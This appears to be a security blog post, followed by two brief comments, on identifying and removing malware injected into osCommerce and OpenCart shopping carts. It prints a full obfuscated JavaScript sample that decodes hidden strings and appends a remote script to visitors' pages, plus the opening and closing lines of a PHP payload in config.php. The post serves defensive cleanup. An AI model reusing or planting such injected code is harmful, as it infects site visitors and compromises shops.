• osCommerce: Identifying Malware

    Websites are now the primary sales funnel for many businesses. Every day, billions of dollars of business is conducted by small to medium sized businesses via their web sites. Most e-commerce web sites use a piece of software called a shopping cart to allow users to pick and choose what they would like to buy and then pay via a number of payment methods.

    One popular application software that web site owners use to manage online transactions is called osCommerce. Thousands of websites use this software. In the last three months we have witnessed a spate of intense attacks targeting shopping cart software like osCommerce. In this post we discuss the specifics of this attack, and how to identify the malware which is injected as a result of this intrusion.

    Identifying the Malware
    The malware targets osCommerce and other shopping carts by exploiting an application vulnerability to inject malware into the web site running the shopping cart – in turn, causing website visitors to become infected. This strain of malware has been extremely pervasive.

    We have seen variants of the following malware on web sites running shopping cart software by osCommerce and OpenCart. The malware can be found in JavaScript, PHP, and HTML files on the infected web site.

    <script type≈ "text/javascript" src≈ "catalog/view/javascript/unitpngfix/unitpngfix.js" > </ sc​ript > <script type≈ "text/javascript" >if (typeof(redef_colors)≈ ≈ "undefined") { var div_colors ≈ new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d'); var redef_colors ≈ 1; var colors_picked ≈ 0; func​tion div_pick_colors(t, styled) {var s ≈ ""; for (j≈ 0; j <t.length; j++) {var c_rgb ≈ t[j]; for (i≈ 1; i <7; i++) {var c_clr ≈ c_rgb.substr(i++, 2); if (c_clr!≈ "00") s +≈ String·fromCharCode (parseInt(c_clr, 16)-15); }}if (styled) {s ≈ s.substr(0, 36) + s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime() + s.substr((s.length-2)); } else {s ≈ s.substr(36, (s.length-38)) + div_colors[1].substr(0, 1)+new Date().getTime(); }return s; } func​tion try_pick_colors() {try { if(!document.getElementById || !document.createElement){ doc​ument.write (div_pick_colors(div_colors, 1)); } else {var new_cstyle≈ document.createElement(" sc​ript "); new_cstyle.type≈ "text/javascript"; new_cstyle.src≈ div_pick_colors(div_colors, 0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); }} catch(e) { }try {check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </ sc​ript > 
    

    What this Attack Does
    The malware code attempts to display a malicious iframe which could lead the visitor to a fake Anti-Virus (AV) website. This opens the door to malware being installed on the website visitor’s personal computer.

    Removing the Malware
    In most shopping cart installations, malware will have been inserted in the config.php file on your website. It is usually located in the following place: www.yoursite.com/config.php.

    Identify the malware in the config.php file that begins with:

    <?php global $ob_starting;
    if(!$ob_starting) {
    function ob_start_flush($s) {
    $tc = array(0, 69, 84, 82, 67, 83, 79, 7
    

    The malware usually ends with a line similar to:

    $ob_starting = time(); @ob_start(“ob_start_flush”); } ?>
    

    The entire code present between the start and end signatures shown above must be removed.

    Conclusion
    Following removal of the malware, you must upgrade your installation of osCommerce, to osCommerce 2.3 or higher, and analyze your website for any application vulnerabilities. Securing the permission settings of your admin directory or renaming the directory to a value different from the default can mitigate automated attacks attempting to exploit osCommerce 2.2 versions.

    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

    • Thanks for the information regarding this leak on oscommerce.

      Posted by Jean on September 21st

    • […] have described how malicious hackers exploit OSCommerce installations in the past, in this article. This current post details a newer upcoming piece of malware that is affecting OSCommerce […]

      Posted by OScommerce hacks – stopthehacker.com – Jaal, LLC on November 7th